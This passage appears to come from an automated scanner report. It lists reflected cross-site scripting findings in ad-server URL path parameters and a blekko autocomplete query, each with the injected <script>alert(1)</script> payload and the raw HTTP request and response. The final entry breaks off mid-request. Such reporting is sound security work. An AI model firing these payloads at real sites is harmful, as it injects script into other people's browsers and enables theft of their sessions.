Path:   /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4c39"><script>alert(1)</script>30bb4a78677 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATTd4c39"><script>alert(1)</script>30bb4a78677/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; id=3375925924; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 21:38:32 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 396
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATTd4c39"><script>alert(1)</script>30bb4a78677/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1/1962202983/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

3.115. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 613f7"><script>alert(1)</script>691cdb4b46f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATT/Wired613f7"><script>alert(1)</script>691cdb4b46f/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; id=3375925924; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 21:38:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 396
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired613f7"><script>alert(1)</script>691cdb4b46f/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1/1916158065/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

3.116. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13275"><script>alert(1)</script>f4b4f57d27c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATT/Wired/Pros-UVerseOpt13275"><script>alert(1)</script>f4b4f57d27c/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; id=3375925924; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 21:38:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 396
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired/Pros-UVerseOpt13275"><script>alert(1)</script>f4b4f57d27c/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1/1957067333/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

3.117. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a923"><script>alert(1)</script>f5c014234ec was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All8a923"><script>alert(1)</script>f5c014234ec/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; id=3375925924; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 21:38:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 396
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2445525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired/Pros-UVerseOpt/All8a923"><script>alert(1)</script>f5c014234ec/12cd8346d-f045-42c9-88fc-dcc60b1aceb1/1788008593/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

3.118. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6db6d"><script>alert(1)</script>442dc3bf57f was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x906db6d"><script>alert(1)</script>442dc3bf57f HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; id=3375925924; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 21:38:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 388
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1/1700368715/x906db6d"><script>alert(1)</script>442dc3bf57f/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

3.119. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90e08"><script>alert(1)</script>3abd5a56497 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader90e08"><script>alert(1)</script>3abd5a56497/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9046165571664830&format=300x250_as&output=html&h=250&w=300&lmt=1298518211&channel=6075235820&ad_type=text_image&color_bg=FFFFFF&color_border=CCCCCC&color_link=085192&color_text=FFFFFF&color_url=085192&flash=10.2.154&url=http%3A%2F%2Fwww.komonews.com%2F&dt=1298497084466&shv=r20101117&jsv=r20110208&saldr=1&correlator=1298497083221&frm=0&adk=3789798029&ga_vid=758392942.1298497003&ga_sid=1298497003&ga_hid=1880891390&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=768&u_w=1364&u_ah=724&u_aw=1364&u_cd=16&u_nplug=9&u_nmime=44&biw=1210&bih=642&fu=0&ifi=2&dtd=112&xpc=8M0zeeSKPz&p=http%3A//www.komonews.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; id=3375925924; dlx_XXX=set; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; ATTWired=ZapTrader

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 21:38:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 396
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader90e08"><script>alert(1)</script>3abd5a56497/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38/1010444679/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

3.120. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c89d7"><script>alert(1)</script>b488108a356 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATTc89d7"><script>alert(1)</script>b488108a356/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9046165571664830&format=300x250_as&output=html&h=250&w=300&lmt=1298518211&channel=6075235820&ad_type=text_image&color_bg=FFFFFF&color_border=CCCCCC&color_link=085192&color_text=FFFFFF&color_url=085192&flash=10.2.154&url=http%3A%2F%2Fwww.komonews.com%2F&dt=1298497084466&shv=r20101117&jsv=r20110208&saldr=1&correlator=1298497083221&frm=0&adk=3789798029&ga_vid=758392942.1298497003&ga_sid=1298497003&ga_hid=1880891390&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=768&u_w=1364&u_ah=724&u_aw=1364&u_cd=16&u_nplug=9&u_nmime=44&biw=1210&bih=642&fu=0&ifi=2&dtd=112&xpc=8M0zeeSKPz&p=http%3A//www.komonews.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; id=3375925924; dlx_XXX=set; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; ATTWired=ZapTrader

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 21:38:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 396
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATTc89d7"><script>alert(1)</script>b488108a356/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38/1088251137/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

3.121. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97a9a"><script>alert(1)</script>244d439e350 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATT/Wired97a9a"><script>alert(1)</script>244d439e350/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9046165571664830&format=300x250_as&output=html&h=250&w=300&lmt=1298518211&channel=6075235820&ad_type=text_image&color_bg=FFFFFF&color_border=CCCCCC&color_link=085192&color_text=FFFFFF&color_url=085192&flash=10.2.154&url=http%3A%2F%2Fwww.komonews.com%2F&dt=1298497084466&shv=r20101117&jsv=r20110208&saldr=1&correlator=1298497083221&frm=0&adk=3789798029&ga_vid=758392942.1298497003&ga_sid=1298497003&ga_hid=1880891390&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=768&u_w=1364&u_ah=724&u_aw=1364&u_cd=16&u_nplug=9&u_nmime=44&biw=1210&bih=642&fu=0&ifi=2&dtd=112&xpc=8M0zeeSKPz&p=http%3A//www.komonews.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; id=3375925924; dlx_XXX=set; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; ATTWired=ZapTrader

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 21:38:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 395
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired97a9a"><script>alert(1)</script>244d439e350/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38/384162992/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

3.122. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 314f5"><script>alert(1)</script>c812b72dfc2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATT/Wired/Pros-UVerseOpt314f5"><script>alert(1)</script>c812b72dfc2/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9046165571664830&format=300x250_as&output=html&h=250&w=300&lmt=1298518211&channel=6075235820&ad_type=text_image&color_bg=FFFFFF&color_border=CCCCCC&color_link=085192&color_text=FFFFFF&color_url=085192&flash=10.2.154&url=http%3A%2F%2Fwww.komonews.com%2F&dt=1298497084466&shv=r20101117&jsv=r20110208&saldr=1&correlator=1298497083221&frm=0&adk=3789798029&ga_vid=758392942.1298497003&ga_sid=1298497003&ga_hid=1880891390&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=768&u_w=1364&u_ah=724&u_aw=1364&u_cd=16&u_nplug=9&u_nmime=44&biw=1210&bih=642&fu=0&ifi=2&dtd=112&xpc=8M0zeeSKPz&p=http%3A//www.komonews.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; id=3375925924; dlx_XXX=set; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; ATTWired=ZapTrader

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 21:38:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 395
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired/Pros-UVerseOpt314f5"><script>alert(1)</script>c812b72dfc2/All/1b5458553-7549-414b-83d2-2100a7556d38/636339535/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

3.123. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c314"><script>alert(1)</script>d3932d3a3a7 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All6c314"><script>alert(1)</script>d3932d3a3a7/1b5458553-7549-414b-83d2-2100a7556d38@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9046165571664830&format=300x250_as&output=html&h=250&w=300&lmt=1298518211&channel=6075235820&ad_type=text_image&color_bg=FFFFFF&color_border=CCCCCC&color_link=085192&color_text=FFFFFF&color_url=085192&flash=10.2.154&url=http%3A%2F%2Fwww.komonews.com%2F&dt=1298497084466&shv=r20101117&jsv=r20110208&saldr=1&correlator=1298497083221&frm=0&adk=3789798029&ga_vid=758392942.1298497003&ga_sid=1298497003&ga_hid=1880891390&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=768&u_w=1364&u_ah=724&u_aw=1364&u_cd=16&u_nplug=9&u_nmime=44&biw=1210&bih=642&fu=0&ifi=2&dtd=112&xpc=8M0zeeSKPz&p=http%3A//www.komonews.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; id=3375925924; dlx_XXX=set; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; ATTWired=ZapTrader

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 21:38:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 395
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired/Pros-UVerseOpt/All6c314"><script>alert(1)</script>d3932d3a3a7/1b5458553-7549-414b-83d2-2100a7556d38/503112095/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

3.124. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90

Issue detail

The value of REST URL parameter 7 (the final path segment, 1b5458553-7549-414b-83d2-2100a7556d38@x90) is copied into the HREF attribute of an <A> element, which is encapsulated in double quotation marks, in a response served as text/html. The payload ebaa7"><script>alert(1)</script>878d79ae95a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response, immediately after the x90 size token, so the same attribute breakout applies as in issue 3.123.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90ebaa7"><script>alert(1)</script>878d79ae95a HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9046165571664830&format=300x250_as&output=html&h=250&w=300&lmt=1298518211&channel=6075235820&ad_type=text_image&color_bg=FFFFFF&color_border=CCCCCC&color_link=085192&color_text=FFFFFF&color_url=085192&flash=10.2.154&url=http%3A%2F%2Fwww.komonews.com%2F&dt=1298497084466&shv=r20101117&jsv=r20110208&saldr=1&correlator=1298497083221&frm=0&adk=3789798029&ga_vid=758392942.1298497003&ga_sid=1298497003&ga_hid=1880891390&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=768&u_w=1364&u_ah=724&u_aw=1364&u_cd=16&u_nplug=9&u_nmime=44&biw=1210&bih=642&fu=0&ifi=2&dtd=112&xpc=8M0zeeSKPz&p=http%3A//www.komonews.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; id=3375925924; dlx_XXX=set; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; ATTWired=ZapTrader

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 21:38:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 387
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38/377266009/x90ebaa7"><script>alert(1)</script>878d79ae95a/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

3.125. http://blekko.com/autocomplete [query parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /autocomplete

Issue detail

The value of the query request parameter is copied unencoded into the response body. The payload e866e<script>alert(1)</script>3984cec7a15 was submitted in the query parameter. This input was echoed unmodified in the application's response. Note that the body is a JSON document served with Content-Type: text/plain; charset=utf-8, so a browser that honours the declared type will not parse it as HTML; the reflection is directly exploitable only where content sniffing or another rendering path treats the body as HTML. It still shows that the endpoint performs no output encoding, and the response carries no X-Content-Type-Options: nosniff header.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /autocomplete?query=ze866e<script>alert(1)</script>3984cec7a15 HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/
